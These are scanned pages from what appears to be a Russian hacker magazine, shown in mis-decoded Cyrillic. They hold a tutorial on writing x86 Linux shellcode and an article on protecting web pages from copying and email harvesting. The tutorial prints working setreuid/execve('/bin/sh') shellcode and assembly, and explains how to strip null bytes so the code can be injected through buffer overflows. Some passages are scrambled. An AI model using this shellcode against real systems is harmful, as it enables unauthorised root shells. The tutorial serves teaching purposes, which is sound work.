Âèäèøü ñêðèíøîò? Ïî ñóòè äåëà ýòî è åñòü øåëë-êîä, òîëüêî íåîáõîäèìî ïðåîáðàçîâàòü åãî â ñîîòâåòñòâóþùèé âèä. Äëÿ ýòîãî ïåðåä êàæäûì áàéòîì äîïèøè ñèìâîë \x è áåç ïðîáåëîâ çàíåñè â ìàññèâ ñèìâîëîâ. Ïðîâåðèòü åãî ðàáîòîñïîñîáíîñòü ìîæíî ñ ïîìîùüþ òàêîé íåñëîæíîé ïðîãðàììû:

char code[]= "\xb8\x46\x00\x00\x00\xbb\x00\x00\x00\x00\xb9\x00\x00\x00\x00\xcd" "\x80\xe9\x15\x00\x00\x00\x5b\xb8\x0b\x00\x00\x00\x68\x00\x00\x00" "\x00\x53\x89\xe1\xba\x00\x00\x00\x00\xcd\x80\xe8\xe6\xff\xff\xff" "\x2f\x62\x69\x6e\x2f\x73\x68\x00"; main() { int (*shell)(); (int)shell = code; shell(); } $ gcc -o shell.c $ ./shell.c Âñå ðàáîòàåò! ÝÒÈ ÇËÛÅ NULL-ÁÀÉÒÛ Ñïåøó òåáÿ îãîð÷èòü. Íåñìîòðÿ íà òî, ÷òî øåëë-êîä íå èñïîëüçóåò ñåãìåíò äàííûõ è äàæå ðàáîòàåò âíóòðè ïðîãðàììû-òåñòåðà, èñïîëüçîâàòü åãî â ðåàëüíûõ ýêñïëîéòàõ ïîêà íåëüçÿ. Âèíîé òîìó íóëåâûå áàéòû (\x00), êîòîðûå â èçîáèëèè ïðèñóòñòâóþò â øåëë-êîäå. Áîëüøèíñòâî îøèáîê Buffer Overflow è ïîäîáíûõ ñâÿçàíû ñ èñïîëüçîâàíèåì ôóíêöèè ðàáîòû ñî ñòðîêàìè: strcpy(), sprintf(), gets(), strcat() è ò.ä. Åñëè ïîïûòàòüñÿ èñïîëüçîâàòü øåëë-êîä â îäíîé èç òàêèõ óÿçâèìîñòåé, ïåðåïîëíèòü áóôåð è èíæåêòèðîâàòü êîä ñ íóëåâûìè áàéòàìè, òî íè÷åãî õîðîøåãî íå âûéäåò. Âñòðåòèâ íóëåâîé áàéò, ôóíêöèÿ ïîäóìàåò, ÷òî âñòðåòèëà êîíåö ñòðîêè è íå ïðî÷èòàåò îñòàâøóþñÿ ÷àñòü øåëë-êîäà. Îò õàêåðà òðåáóåòñÿ âñåìè ñèëàìè èçáåãàòü ñèòóàöèè, êîãäà â øåëëêîäå ïîÿâëÿþòñÿ íóëåâûå áàéòû. Ýòèì ìû, ñîáñòâåííî, è çàéìåìñÿ. Èäåÿ ïðîñòàÿ: íàéòè òå ó÷àñòêè êîäà, êîòîðûå ïîðîæäàþò íóëåâûå áàéòû, è âèäîèçìåíèòü èõ òàêèì îáðàçîì, ÷òîáû êîìáèíàöèè \x00 â øåëë-êîäå áîëüøå íå âñòðå÷àëîñü. Îïûòíûé ïðîãðàììèñò

XÀÊÅÐ 01 /85/ 06


Íåîáõîäèìûå òóëçû: Nasm (nasm.sourceforge.net) Hexdump (www.canb.auug.org.au/~millerp/hexdump.html)

Êîëëåêöèè øåëë-êîäîâ è äîêóìåíòàöèè ïî òåìå: Metasploit.com packetstormsecurity.com/shellcode www.shellcode.org

âîëüíûé ñèìâîë è ïðåâðàòèòü åãî â íîëü ëèøü â ïðîöåññå âûïîëíåíèÿ ïðîãðàììû. Ýòî äåëàåòñÿ ïðèìåðíî òàê:

Jmp short code: Ïîñëå âñåõ äîðàáîòîê íóëåâûå áàéòû èñ÷åçëè

â áîëüøèíñòâå ñëó÷àåâ ëåãêî ìîæåò îïðåäåëèòü èç-çà ÷åãî â ìàøèííîì êîäå ïîÿâëÿþòñÿ íóëè, íî íàì, êàê íîâè÷êàì, íåîáõîäèìà ïîìîùü äèçàññåìáëåðà. Âîñïîëüçóåìñÿ ndisasm:

$ nasm shell.asm $ ndisasm shell.asm Ïîñëå âûïîëíåíèÿ ýòîé êîìàíäû íà ýêðàí áóäåò âûâåäåí äèçàññåìáëèðîâàííûé êîä ïðîãðàììû. Ïåðâûé ñòîëáåö — àäðåñ èíñòðóêöèè, îí äëÿ íàñ íå îñîáåííî âàæåí. Âî âòîðîì ñòîëáöå ðàñïîëîæåíû ìàøèííûå èíñòðóêöèè, òî÷íî òàêèå æå, êàê è ïðè ïðîñìîòðå áèíàðíèêà hexdump'îì.  òðåòüåì ñòîëáöå äëÿ êàæäîé ìàøèííîé èíñòðóêöèè äàí ýêâèâàëåíò íà àññåìáëåðå. Òîëüêî ñ ïîìîùüþ àññåìáëåðíîãî êîäà ìû ìîæåì ñóäèòü î òîì, îòêóäà âçÿëè íóëåâûå áàéòû â øåëë-êîäå. Ïîñëå áåãëîãî îñìîòðà äàìïà ñòàíîâèòñÿ ÿñíî, ÷òî áîëüøèíñòâî NULL-áàéòîâ ñâÿçàíû ñ èíñòðóêöèÿìè, êîòîðûå óïðàâëÿþò ñîäåðæèìûì ðåãèñòðà è ñòåêà. Ýòîãî ñëåäîâàëî îæèäàòü, ïîñêîëüêó ìû ðàáîòàåì â 32-áèòíîì ðåæèìå è, ñîîòâåòñòâåííî, äëÿ êàæäîãî ÷èñëà âûäåëÿåòñÿ 4 áàéòà ïàìÿòè. Ìû æå îïåðèðóåì ÷èñëàìè, äëÿ êîòîðûõ õâàòàåò è îäíîãî áàéòà. Íàïðèìåð, â ñàìîì íà÷àëå ïðîãðàììû shell ìû èìååì ñëåäóþùóþ êîíñòðóêöèþ «mov eax, 70» (çàíåñòè â ðåãèñòð eax ÷èñëî 70).  äàìïå è øåëë-êîäå ýòà èíñòðóêöèÿ ïðåäñòàâëåíà êàê «B8 46 00 00 00». Ïðè÷åì B8 — ýòî ìàøèííûé ýêâèâàëåíò àññåìáëåðíîé êîìàíäû mov ax, à B8 00 00 00 — ÷èñëî 70 â øåñòíàäöàòåðè÷íîé ñèñòåìå ñ÷èñëåíèÿ, äîïîëíåííîå íóëÿìè äî ðàçìåðà 4-õ áàéò. Àíàëîãè÷íî âîçíèêàåò åùå ìíîæåñòâî NULL-áàéòîâ. Ê ñ÷àñòüþ, ðåøèòü ýòó ïðîáëåìó áóäåò ïðîùå ïðîñòîãî. Äîñòàòî÷íî âñïîìíèòü, ÷òî 32-áèòíûå ðåãèñòðû (EAX, EBX è äðóãèå, íà÷èíàþùèåñÿ ñ áóêâû e) ìîæíî ðàçëîæèòü íà ðåãèñòðû ìåíüøåé ðàçìåðíîñòè. Ïîñìîòðè íà èëëþñòðàöèþ è òåáå ñðàçó ñòàíåò ÿñíî, ÷òî íèêòî íå ìåøàåò íàì ðàáîòàòü ñ äâóõáàéòíûì ðåãèñòðîì AX, à òàêæå ñ åãî ìëàäøåé è ñòàðøåé ÷àñòÿìè AL è AH. Ïîñëåäíèå èìåþò ðàçìåð âñåãî â îäèí áàéò — êàê ðàç òî, ÷òî íàì íàäî. Íóæíî ëèøü çàìåíèòü «mov eax, 70» íà «mov al, 70» è ò.ä. Âàæíî ïîçàáîòèòüñÿ î òîì, ÷òîáû îñòàëüíàÿ ÷àñòü ðåãèñòðà íå ñîäåðæàëà ìóñîðà. Áûñòðî è ýôôåêòèâíî îáíóëèòü çíà÷åíèå âñåãî ðåãèñòðà ìîæíî, âîñïîëüçîâàâøèñü ëîãè÷åñêîé ôóíêöèåé «èñêëþ÷àþùåå èëè». Òàê, «xor eax,eax» îáíóëèò çíà÷åíèå ðåãèñòðà EAX. ÏÐÎÁËÅÌÛ ÍÅ ÊÎÍ×ÀÞÒÑß Äàæå ïîñëå âíåñåííûõ èçìåíåíèé øåëë-êîä âñå ðàâíî ñîäåðæèò íóëåâûå áàéòû. Îòëàä÷èê ïîêàçûâàåò, ÷òî èñòî÷íèê âñåõ áåä — èíñòðóêöèÿ jmp:

E91500 0000

jmp add

0x29 [bx+si],al

Òóò åñòü îäíà õèòðîñòü: âìåñòî îáû÷íîé êîìàíäû jmp íóæíî èñïîëüçîâàòü èíñòðóêöèþ áëèçêîãî ïåðåõîäà — jmp short.  íåáîëüøèõ ïðîãðàììàõ, èìåþùèõ ïðîñòóþ ñòðóêòóðó, ýòè èíñòðóêöèè àáñîëþòíî ðàâíîïðàâíû, îäíàêî ìàøèííûé êîä âî âòîðîì ñëó÷àå íå ñîäåðæèò íóëåâûõ áàéòîâ. À èìåííî ýòî íàì è íàäî. Êàçàëîñü áû, âñå ãîòîâî. Øåëë-êîä äîëæåí áûòü èäåàëüíûì, íî íåò!  íåì ïî-ïðåæíåìó îñòàåòñÿ îäèí-åäèíñòâåííûé è ïîäëûé íóëü-áàéò. Îí íàõîäèòñÿ â ñàìîì êîíöå íàøåãî øåëë-êîäà è ïîÿâëÿåòñÿ òàì èç-çà òîãî, ÷òî ñòðîêà, ñîäåðæàùàÿ ïóòü ê èíòåðïðåòàòîðó ('/bin/sh', 0), çàêàí÷èâàåòñÿ íóëåì. Êàê ãîâîðèëîñü ðàíåå, ýòîò íîëü íåîáõîäèì äëÿ ïðàâèëüíîé ðàáîòû ïðèëîæåíèÿ (ôóíêöèè execve()). Ïðîñòî âçÿòü è óäàëèòü åãî íåëüçÿ, êàê áû òåáå ýòîãî íè õîòåëîñü. Íî ìîæíî âîñïîëüçîâàòüñÿ åùå îäíîé õèòðîñòüþ: íà ýòàïå êîìïîíîâêè âìåñòî íóëÿ ìîæíî óêàçàòü ïðîèçXÀÊÅÐ 01 /85/ 06

stuff

pop esi ; àäðåñ íà÷àëà ñòðîêè ; òåïåðü â ðåãèñòðå ESI xor eax,eax ; îáíóëÿåì ðåãèñòð EAX mov byte [esi + 17],al ; îòñ÷èòûâàåì 18 ñèìâîëîâ (íóìåðàöèÿ ñ íóëÿ) ; è çàíîñèì òóäà íîëü (ðåãèñòð EAX ïîëíîñòüþ ; ðàâåí íóëþ) ; Òåïåðü ñòðîêà ïðåâðàòèòüñÿ â «This is my string0» stuff: call code db 'This is my string#' Òåïåðü ïðèìåíèì ýòîò ïðèåì ïî îòíîøåíèþ ê ïðîãðàììå shell.asm:

BITS 32 ;setreuid(0, 0) xor eax,eax mov al, 70 xor ebx,ebx xor ecx,ecx int 0x80 jmp short two one: pop

ebx

; execve("/bin/sh",["/bin/sh", NULL], NULL) xor eax,eax mov byte [ebx+7], al push eax push ebx mov ecx, esp mov al,11 xor edx,edx int 0x80 two: call one db

'/bin/sh#'

Îòêîìïèëèðîâàâ ïðîãðàììó, óáåæäàåìñÿ, ÷òî íóëåâûõ áàéòîâ áîëüøå íåò. Ñòîèò îòìåíèòü, ÷òî ïðîáëåìà ìîæåò âîçíèêíóòü íå òîëüêî èç-çà íóëåé. Ñïåöèàëüíûå ñèìâîëû (ê ïðèìåðó, ñèìâîë êîíöà ñòðîêè) â íåêîòîðûõ ñëó÷àÿõ òàêæå ìîãóò ñòàòü ïðè÷èíîé íóëåâûõ áàéòîâ â øåëë-êîäå. Ê ÄÅÉÑÒÂÈÞ Â ñòàòüå ïðèâåäåíû íàèáîëåå âàæíûå ïðèåìû, êîòîðûå ïîíàäîáÿòñÿ ïðè ñîñòàâëåíèè øåëë-êîäîâ. Îäíàêî äëÿ óñïåõà íåäîñòàòî÷íî ïðîñòî ïðî÷èòàòü ýòîò ìàòåðèàë. Âàæíî êàê ìîæíî ãëóáæå ðàçîáðàòüñÿ ñ îïåðàöèîííîé ñèñòåìîé, ïîä êîòîðóþ ïèøåòñÿ øåëë-êîä, à òàêæå ïðîãðàììèðîâàíèåì íà àññåìáëåðå. Íàäåþñü, ïðèâåäåííûå ïðèìåðû óáåäèëè òåáÿ â òîì, ÷òî íè÷åãî ÷ðåçâû÷àéíî ñëîæíîãî çäåñü íåò. Âñå äîâîëüíî ïðîñòî è ëîãè÷íî. Ãëàâíîå — íå áîÿòñÿ îòêðûòü äîêóìåíòàöèþ è íåìíîãî ïîýêñïåðèìåíòèðîâàòü. BINARY YOUR’S z

055


ÂÇËÎÌ ÂÇËÎÌ ///// ISSUE

TEXT ÄÎÊÓ×ÀÅ ÄÌÈÒÐÈÉ AKA FORB / FORB@REAL.XAKEP.RU /

ÙÈÒ ÄËß WEB-Ê ÊÎÍÒÅÍÒÀ ÌÅÒÎÄÛ È ÒÅÕÍÎËÎÃÈÈ ÇÀÙÈÒÛ WEB-ÊÎÍÒÅÍÒÀ

ÂÎÐÎÂÑÒÂÎ Â ÃËÎÁÀËÜÍÎÉ ÑÅÒÈ ÅÙÅ ÁÎËÅÅ ÐÀÇÂÈÒÎ, ×ÅÌ Â ÐÅÀËÜÍÎÉ “ ÆÈÇÍÈ.  ÈÍÒÅÐÍÅÒÅ ÂÎÐÓÞÒ ÂÑÅ: ÏÀÐÎËÈ, ÀÑÜÊÈ, ÏÎ×ÒÎÂÛÅ ÀÊÊÀÓÍÒÛ, ÏÅÐÅÏÈÑÊÓ, WEB-ÄÈÇÀÉÍ, ÊÀÐÒÈÍÊÈ È ÈÑÕÎÄÍÈÊÈ ÄÎÐÎÃÈÕ ÏÐÎÃÐÀÌÌ. Î×ÅÍÜ ÑËÎÆÍÎ ÇÀÙÈÙÀÒÜ ÎÒ ÊÐÀÆÈ È ÍÅÇÀÊÎÍÍÎÃÎ ÈÑÏÎËÜÇÎÂÀÍÈß ÒÎ, ×ÒÎ ÏÎ ÑÂÎÅÉ ÏÐÈÐÎÄÅ È ÑÓÙÍÎÑÒÈ ÄÎËÆÍÎ ÁÛÒÜ ÄÎÑÒÓÏÍÎ ÁÎËÜØÎÌÓ ×ÈÑËÓ ËÞÄÅÉ. ÎÄÍÀÊÎ ÑËÎÆÍÎ — ÝÒÎ ÍÅ ÑÈÍÎÍÈÌ ÑËÎÂÀ «ÍÅÂÎÇÌÎÆÍλ. CÅÃÎÄÍß ÌÛ ÍÀÓ×ÈÌÑß ÇÀÙÈÙÀÒÜ ÎÒ ÊÐÀÆÈ HTML-ÊÎÄ ÑÒÐÀÍÈÖ, ÊÐÀÑÈÂÓÞ ÃÐÀÔÈÊÓ, ÊÀÐÒÈÍÊÈ È ÄÀÆÅ ÈÑÕÎÄÍÈÊÈ PHP-ÑÈÑÒÅÌ ÇÀÙÈÒÀ ÎÒ ÑÀÌÛÕ ÌÀËÅÍÜÊÈÕ Ìíîæåñòâî ïîëüçîâàòåëåé òàê èëè èíà÷å íå õîòÿò óêðàñòü íåïîñðåäñòâåííî äèçàéí. Îíè æåëàþò ñêîïèðîâàòü êóñîê òåêñòà, ñîõðàíèòü êàðòèíêó èëè îñòàâèòü ñåáå íà ïàìÿòü HTML-ôðàãìåíò. Ñ òàêèìè þçåðàìè ìû è áóäåì áîðîòüñÿ â ïåðâóþ î÷åðåäü, òàê êàê èõ áîëüøèíñòâî. Âî-ïåðâûõ, åñëè òû íå æåëàåøü, ÷òîáû èñõîäíèê ñòðàíèöû áûë ïðîñìîòðåí ïîëüçîâàòåëåì, òî îáÿçàòåëüíî çàïðåòè åå êýøèðîâàíèå íà äèñê. Òî åñòü ïîñëå ïîñåùåíèÿ ïîëüçîâàòåëåì ññûëêè, ñòðàíèöà íå áóäåò ñîõðàíÿòüñÿ â êýøå. Íàâåðíÿêà òû çíàåøü, êàê ýòî ñäåëàòü, íî âñå æå íàïîìíþ òåáå îïöèþ, êîòîðàÿ äîëæíà ïðèñóòñòâîâàòü â áëîêå <head></head>:

056

<SCRIPT LANGUAGE="JavaScript"> document.ondragstart = test; document.onselectstart = test; document.oncontextmenu = test; function test() { return false } </SCRIPT>

<META HTTP-EQUIV=Cache-Control content=no-cache>

Òðè ñîáûòèÿ, ññûëàþùèåñÿ íà ôóíêöèþ test(), ñëåäÿò çà ïåðåòàñêèâàíèåì, âûäåëåíèåì ýëåìåíòîâ, à òàêæå çà âûçîâîì êîíòåêñòíîãî ìåíþ. Êàê âèäèøü, ñàìà ôóíêöèÿ — îáû÷íàÿ ïóñòûøêà, âîçâðàùàþùàÿ ëîæíîå çíà÷åíèå.

Âî-âòîðûõ, ìîæíî çàùèòèòüñÿ JavaScript’îì, ïîçâîëÿþùèì çàïðåòèòü êîïèðîâàíèå òåêñòà ñ HTML-ñòðàíèöû. Ýòîò ïðèåì î÷åíü ìîäåí â íàøè äíè, îäíàêî ïåðåä åãî ïðèìåíåíèåì çàäóìàéñÿ, íå îòïóãíåò ëè îí òâîèõ ïîñåòèòåëåé. Åñëè òû âñå æå ðåøèëñÿ íà ïîäîáíûé ñïîñîá — äîáàâü â òîò æå áëîê çàãîëîâêà ñëåäóþùèé ñêðèïò.

ÀÄÐÅÑÀ  ÎÏÀÑÍÎÑÒÈ Â ïîñëåäíåå âðåìÿ ó çëîóìûøëåííèêîâ ïîÿâèëñÿ íåçäîðîâûé èíòåðåñ ê èñõîäíèêàì HTML-ñòðàíèö. Íî îí âûçûâàåòñÿ îòíþäü íå ïðåëåñòÿìè äèçàéíà, à âñåãî-òî íàëè÷èåì e-mail àäðåñîâ. ß ãîâîðþ ïðî îáû÷íûõ ñïàìåðîâ, êîòîðûå çàïóñêàþò ïàó÷êà â ïðîñòîðû Èíòåðíåòà. Ïîñëåäíèé, ïðîâåðÿÿ êàæäóþ ññûëêó ñàé-

XÀÊÅÐ 01 /85/ 06


Íåñìîòðÿ íà âñå îáåùàíèÿ, íåêîòîðûå ïðîãðàììû øèôðóþò HTML òàê, ÷òî ïîòîì â íåêîòîðûõ áðàóçåðàõ íàáëþäàþòñÿ ãëþêè.  ÷àñòíîñòè ÿ îáíàðóæèë, ÷òî ïîñëå HTML Power ó ìåíÿ ïåðåñòàëî ðàáîòàòü íàâèãàöèîííîå ìåíþ íà JavaScript. Ïðè÷åì â IE òàêèõ ãëþêîâ íå íàáëþäàëîñü.

òà, çàïèñûâàåò âñå ìûëüíèêè, êîòîðûå òàì âñòðå÷àþòñÿ. Ïîýòîìó ìóäðûå äèçàéíåðû èçîáðåëè ðÿä óõèùðåíèé, ñïîñîáíûõ çàùèòèòü îò ïîäîáíûõ íàïàñòåé. Ïåðâûé è ñàìûé ïðîñòîé ñïîñîá çàùèòû — èñïîëüçîâàíèå unicode-ñèìâîëîâ, êîòîðûå ïîíèìàþò áîëüøèíñòâî áðàóçåðîâ. Äëÿ îáû÷íîãî ïîëüçîâàòåëÿ ýòîò àäðåñ áóäåò âûãëÿäåòü íîðìàëüíî, íî â èñõîäíèêàõ HTML-ñòðàíèöû îí îêàæåòñÿ çàêîäèðîâàííûì. Ðàññìîòðèì ïðîñòîé ïðèìåð. Äîïóñòèì, íà ñòðàíèöå ôîðóìà èìååòñÿ e-mail forb@real.xakep.ru. ß íå õî÷ó, ÷òîáû ìåíÿ äîñòàâàëè ñïàìåðû (â ÿùèê ìíå ñûïåòñÿ ïîðÿäêà 200 ïèñåì ìóñîðà êàæäûé äåíü :)), ïîýòîìó ùåäðî ïîäåëèëñÿ ñ àâòîðîì áîðäû ñïîñîáîì unicode-êîäèðîâàíèÿ. Èòàê, àäðåñ ïðåäñòàâëåí ñëåäóþùåé ñòðîêîé: <a href=”forb@real.xakep.ru”>forb@real.xakep.ru</a>. Íàøà çàäà÷à çàêîäèðîâàòü çíà÷åíèå ïàðàìåòðà href, òàê êàê èìåííî åãî ãðàáÿò ñïàìåðñêèå ïàóêè. Âñå ñèìâîëû ìîæíî çàìåíèòü êîíñòðóêöèåé &#NUM;, ãäå NUM — êàêîå-ëèáî ÷èñëî. Ê ïðèìåðó, ìîé àäðåñ ìîæíî çàêîäèðîâàòü òàê:

&#102;&#111;&#114;&#98;&#64;&#114;&#101;&#97;&#108;& #46;&#120;&#97;&#107;&#101;&#112;&#46;&#114;&#117; Íî ìîæåò áûòü òàêîå, ÷òî âðàæåñêèé ðîáîò áóäåò ãðàáèòü ïîëå òåêñòà (áëîê <a></a>), ïîýòîìó íà ñòðàíèöå âîîáùå íå íóæíî ñâåòèòü íèêàêèõ ìûëüíèêîâ, à ïðîñòî, ñêàæåì, çàìåíèòü àäðåñ íèêîì íà ôîðóìå. Âóà-ëÿ, êîíñòðóêöèÿ ïðåâðàòèëàñü â íå÷òî ïîäîáíîå:

è ïî÷òîâûé äîìåí.  ôóíêöèè ïðîèñõîäèò ñëèÿíèå ýòîé èíôîðìàöèè ñ «ñîáàêîé», è íà âûõîäå ïîëó÷àåòñÿ âïîëíå ðàáî÷èé àäðåñ. Ïîäîáíóþ çàùèòó îáîéòè î÷åíü íåïðîñòî, ïîýòîìó ïàóêè ïðîñòî èãíîðèðóþò, òî åñòü «íå ïîäðó÷íîå ñðåäñòâî äëÿ êîäèðîâàíèÿ àäðåñîâ çàìå÷àþò» ðåàëüíûõ àäðåñîâ. Íàêîíåö ìîæíî ïîïðîáîâàòü ìîäåðíèçèðîâàòü ñêðèïò, âêëþ÷èâ â íåãî êàêîå-íèáóäü äîïîëíèòåëüíîå êîäèðîâàíèå, ëèáî ñêðåñòèòü åãî ñ unicode-çàùèòîé. Çäåñü òû ñàì ñåáå àðõèòåêòîð :).  íàøå âðåìÿ îñîáóþ ïîïóëÿðíîñòü çàâîåâàëè ÿçûêè Perl è PHP, ñ ïîìîùüþ êîòîðûõ òàêæå ìîæíî çàùèòèòüñÿ îò âèðòóàëüíûõ ñóïîñòàòîâ. Ïåðâîå, ÷òî ïðèõîäèò â ãîëîâó, — ýòî èñïîëüçîâàòü íåñëîæíûé ñêðèïò, êîòîðûé ïðè ðåãèñòðàöèè ó÷àñòíèêà çàíîñèë e-mail â ñïåöèàëüíóþ áàçó. Êàæäûé àäðåñ äîëæåí èìåòü óíèêàëüíûé íîìåð. Çàòåì â êà÷åñòâå ïàðàìåòðà «href» ïîìåùàåòñÿ ññûëêà íà ñêðèïò ñ ýòèì íîìåðîì, à ïîñëåäíèé çàïóñêàåò ïî÷òîâóþ ïðîãðàììó èëè ïðîñòî îòîáðàæàåò íóæíûé àäðåñ. Äëÿ ïðèìåðà íàïèøó êîíñòðóêöèþ, êîòîðàÿ âïîëíå ìîæåò èìåòü ìåñòî â òâîåé HTML-ñòðàíè÷êå:

<a href=/cgi-bin/mail.pl?31337>Ôîðá</a>. Ïîñëå êëèêà ïî ìîåìó íèêó âûçîâåòñÿ ñêðèïò, êîòîðûé ïîêàæåò e-mail àäðåñ èëè çàïóñòèò ïî÷òîâóþ ïðîãðàììó (web-èíòåðôåéñ) äëÿ îòïðàâêè ìîëåáíîãî ïèñüìà :).

ÒÓ.. ÎÄ ÍÀ ËÅÒ Ò ÞÍÈÊÎ ÑØÈÔÐÎÂÛÂÀÞÒ ÎÐÛÅ ÐÀÑ Ò Î Ê È, ÀÓÊ Ï ÛÅ ÌÍ Ó Ü Ò Ñ Å ß Â ÍÀØÅ ÂÐÅÌ

<a href=”&#102;&#111;&#114;&#98;&#64;&#114;&#101;&#97;&#1 08;&#46;&#120;&#97;&#107;&#101;&#112;&#46;&#114;&#117; ”>Ôîðá</a> Òåïåðü äàæå ó ñàìîãî ñèëüíîãî ðîáîòà ñëó÷èòñÿ èíôàðêò, à åãî õîçÿèí áóäåò î÷åíü äîëãî ðàñøèôðîâûâàòü òàéíûå ðóêîïèñè â ëîãàõ ãðàááåðà. Øó÷ó :).  íàøå âðåìÿ åñòü óìíûå ïàóêè, êîòîðûå ðàñøèôðîâûâàþò óíèêîä íà ëåòó. Íî íå âñå òàê ïëîõî, ïîñêîëüêó ýòîò ñïîñîá íå ÿâëÿåòñÿ åäèíñòâåííûì è íåïîâòîðèìûì. Äëÿ áîëåå æåñòêîãî êîäèðîâàíèÿ àäðåñà îáðàòèìñÿ çà ïîìîùüþ ê JavaScript.

<head> <title>Çàùèòà îò ñïàìà</title> <script language="JavaScript"> function email (login, domain) { mail = login + "@" + domain; document.write (mail); } </script> </head> <body> E-mail: <script>email("forb","real.xakep.ru");</script> </body> Âîò î÷åíü ïðîñòàÿ è ñîâåðøåííàÿ çàùèòà, êîòîðóþ âðÿä ëè îñèëèò ñïàìåðñêèé ðîáîò. Äóìàþ, èäåÿ òåáå ïîíÿòíà: ïðè íåîáõîäèìîñòè ïå÷àòè åìåéëà, çàïóñêàåòñÿ ôóíêöèÿ mail(), êîòîðîé ïåðåäàåòñÿ èìÿ

XÀÊÅÐ 01 /85/ 06

ÏÐÎÃÐÀÌÌÍÛÉ ÐÀÉ Ëåãêî ïîíÿòü, ÷òî âåñü HTML-êîíòåíò ìîæíî çàùèòèòü îïðåäåëåííûì êîäèðîâàíèåì, ïðè êîòîðîì òåëî äîêóìåíòà íåêîòîðûì îáðàçîì êðèïòóåòñÿ, à ïåðåä îòîáðàæåíèåì ïîëüçîâàòåëþ ðàñøèôðîâûâàåòñÿ ïðè ïîìîùè «çàãðóç÷èêà», íàïèñàííîãî íà JavaScript. Âñå ýòî ìîæåò áûòü äîïîëíèòåëüíûì îáðàçîì ïåðåìåøàíî è çàïóòàííî, ÷òîáû ðàçîáðàòüñÿ â ìåñåâå ñòðàííûõ ñèìâîëîâ áûëî íåðåàëüíî. Ñàìî ñîáîé, ïðîãðàììèñòû óæå ñîçäàëè ìíîæåñòâî ñîôòèí, äåëàþùèå âñþ ýòó ðàáîòó çà òåáÿ. Êàæäàÿ èç ïðîãðàìì èìååò ñâîè ïëþñû è ìèíóñû, ïîýòîìó èç áîëüøîãî àññîðòèìåíòà òóëç ÿ âûáðàë âñåãî òðè, âîçìîæíîñòè êîòîðûõ ñåé÷àñ è îïèøó. 1 Encrypt HTML Pro (www.htmlpassword.com/download/enchp.zip). Äîâîëüíî ïðîñòàÿ è ôóíêöèîíàëüíàÿ ïðîãðàììà Encrypt HTML Pro ïîçâîëÿåò çàøèôðîâàòü öåëèêîì âñþ èëè îïðåäåëåííóþ ÷àñòü HTML-ñòðàíèöû. Ïîñëå çàïóñêà ñîôòèíêè íåîáõîäèìî ñêîðìèòü åé îäèí èëè íåñêîëüêî ôàéëîâ (øàã Files), çàòåì âûáðàòü îáëàñòü

èãðàåìñÿ ñ òýãàìè â HTML Power

ïðîöåññ êîäèðîâàíèÿ HTML

057


ÂÇËÎÌ ///// ISSUE

ÎÏÊÅ Î ÏÐÀÂÎÉ ÊÍ

ííûì ß íå ìîãó óñòîÿòü ïåðåä ñàìûì ðàñïðîñòðàíå èðîâàáëîê Ýòî û. àíèö L-ñòð HTM ïðèåìîì çàùèòû ìó åãî ñîçíèå ïðàâîé êíîïêîé ìûøè. Íå çíàþ, ïî÷å ó, íà ìîé äàòåëè âåðÿò â åãî ýôôåêòèâíîñòü, ïîñêîëüê õ çåëåñàìû îò ÷òî ðàçâå åò âçãëÿä, çàùèòèòü îí ìîæ ïðåïÿòíûõ íîâè÷êîâ. À âîò ñîáñòâåííî è ñêðèïò, ñòâóþùèé íàæàòèþ êíîïêè ãðûçóíà. <SCRIPT language=JavaScript> function click(e) {if (document.all) {if (event.button == 2) {alert(message);return false;}} if (document.layers) {if (e.which == 3) {return false;}}} if (document.layers) {document.captureEvents(Event.MouseDown);} document.onmousedown=click; </SCRIPT> ìîæíî Äóìàþ ïîíÿòíî, ÷òî îáîéòè òàêóþ çàùèòó â ðàçäåëå L» HTM âèäå â òð îñìî «Ïð è îïöè âûáîðîì íà êè êíîï åé âóþù âåòñò ñîîò «Âèä» èëè íàæàòèåì ñïîñîá îáû÷íîé êëàâèàòóðå. Ñóùåñòâóåò åùå îäèí òóþò èñïðîòèâ âîðîâ HTML-äèçàéíà. Çíàòîêè ñîâå å ñî âêóï ) URL pen( ow.o ïîëüçîâàòü Java-âûçîâ wind ýòîì Ïðè êó. êíîï óþ ïðàâ ùèì èðóþ áëîê , ïòîì ñêðè à äíèê èñõî äî àòüñÿ äîáð ñòü îæíî åäèíñòâåííàÿ âîçì íà ïêè -êíî ñïåö ëèáî — íàæàòèå ãîðÿ÷åé êëàâèøè åò ââåñêëàâèàòóðå. Ýòî, ïî ìíåíèþ àíàëèòèêîâ, ìîæ ïðèåáíûå ïîäî ÷òî àþ, ñ÷èò ÿ òè ëþäåé â ñòóïîð. Íî . ìû ïîäåéñòâóþò ðàçâå ÷òî ïðîòèâ íîâè÷êîâ øèôðîâàíèÿ (ñåêöèÿ <body>, âñÿ ñòðàíèöà, ëèíêè, e-mail’û è ò.ï.). Ïîñëå ýòîãî ñòîèò óäåëèòü âíèìàíèå JavaScript-âêëàäêàì, êîòîðûå ïîçâîëÿþò çàïðåòèòü íàæàòèå ïðàâîé êíîïêè, çàïðåò ïå÷àòè ñòðàíèöû è ò.ï. È íà ôèíàëüíîì øàãå òû ïîëó÷èøü çàøèôðîâàííóþ HTML-ñòðàíè÷êó. Âñå, êîíå÷íî, çäîðîâî, íî ó ïðîãðàììû åñòü äâà ìèíóñà. Âî-ïåðâûõ, çà íåå ïðîñÿò àæ 30 çåëåíûõ ïðåçèäåíòîâ, à âî-âòîðûõ, ðàçìåð HTML-ñòðàíèöû óâåëè÷èâàåòñÿ â 5 ðàç. Çàòî, êàê îáåùàþò ïðîèçâîäèòåëè øèôðîâùèêà, ëþáîé áðàóçåð ñìîæåò êîððåêòíî îòîáðàçèòü çàêðèïòîâàííûé HTML. 2 HTML Power (www.pullsoft.com/HTMLPower_SETUP.exe). Ñîçäàòåëè ýòîãî ïðîäóêòà íàçâàëè HTML Power ñðåäñòâîì êîìïëåêñíîé çàùèòû ñàéòà. Íà ñàìîì äåëå âîçìîæíîñòè ïðîãðàììû ìàëî îòëè÷àþòñÿ îò ñîôòèíû Encrypt HTML. Ðàçâå ÷òî âêëàäêàìè, êîòîðûå ðàñïîëîæåíû íå âåðòèêàëüíî, à ãîðèçîíòàëüíî :). Âïðî÷åì, òðè îòëè÷èÿ ìíå âñå æå óäàëîñü íàéòè. Ðàçìåð çàøèôðîâàííîé ïàãè ìåíüøå òîãî, êîòîðûé âûäàâàë êîíêóðåíò HTML Power — âñåãî â 3 ðàçà áîëüøå èñõîäíîãî. Òàê æå ìîæíî çàìåòèòü âêëàäêó Meta Tags, â êîòîðîé óêàçûâàþòñÿ òýãè, íå 